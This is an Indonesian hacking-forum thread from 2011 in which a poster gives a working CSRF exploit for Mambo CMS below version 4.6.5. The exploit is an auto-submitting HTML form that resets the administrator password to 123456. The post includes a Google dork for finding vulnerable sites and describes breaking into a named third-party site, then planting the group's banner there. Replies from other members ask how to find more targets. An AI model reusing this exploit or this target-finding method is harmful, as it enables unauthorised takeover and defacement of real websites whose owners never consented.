Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Postby poni » Wed Aug 31, 2011 3:00 am

Mambo adalah CMS web opensource gratis yg banyak digunakan sebagai sistem managemen website. Mambo < 4.6.5 memiliki bug CSRF (Cross Site Request Forgery) dimana hacker bisa mengubah password admin melalui script sederhana. Ingat loh, hanya versi dibawah 4.6.5 yang bisa ditembus dengan teknik ini.

Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser

buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.

Code: Select all
<html>
<head>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}

   </script>
<form action="http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm">
   
   <input type="hidden" name="name" value="Administrator" />
   <input type="hidden" name="username" value="admin" />
        <input type="hidden" name="email" value="" />
   <input type="hidden" name="password" value="123456" />
   <input type="hidden" name="password2" value="123456" />
   <input type="hidden" name="gid" value="25" />            
   <input type="radio" name="block" value="0" checked="checked" />
   <input type="radio" name="block" value="1" />
   <input type="radio" name="sendEmail" value="0" />
   <input type="radio" name="sendEmail" value="1" checked="checked" />

</form>


perhatikan source diatas.
target web adalah http://www.classiminashost.com
username = admin
password = 123456

itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.

simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:

Image
setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.

Image
halaman akan redirect ke http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1 . isi username dengan admin dan password 123456

Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.

Image

:) sekalian nitip logo xcode.

Code: Select all
http://www.classiminashost.com/images/stories//bannerxcode.bmp
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Postby Jepret » Wed Aug 31, 2011 4:31 am

Wow Bos Poni Ga ada mateee nya... mantep Gan..

bos tanya neh sy msh newbie.. ciri2 web mambo apa bos mau coba target lain.. hehehhe
Jepret
 
Posts: 10
Joined: Fri Apr 30, 2010 3:12 am

reza

Postby onteill » Tue Sep 06, 2011 8:16 pm

gan ane udah cobak ni tehnik..
tpi cuman masuk login formnya doang..
kgak bisa masuk ke admin situsnya..
mohon pencerahannya...
onteill
 
Posts: 1
Joined: Sun Sep 04, 2011 6:20 am

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Postby djisamsoe » Thu Sep 29, 2011 8:48 am

ijin nyimak bos..! terusin dah
djisamsoe
 
Posts: 22
Joined: Tue Sep 27, 2011 7:42 am

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Postby andri x code » Fri Nov 04, 2011 11:25 pm

kak klu untuk CMS mambo yang versi 4.5.2 gimana ya??
klu aku coba metode seperti yang di atas, ngk bisa masuk kk
ada tulisan Incorrect Username, Password, or Access Level. Please try again di sana kk
:(
andri x code
 
Posts: 3
Joined: Sun Aug 29, 2010 9:23 pm

leave a comment


Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 11 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id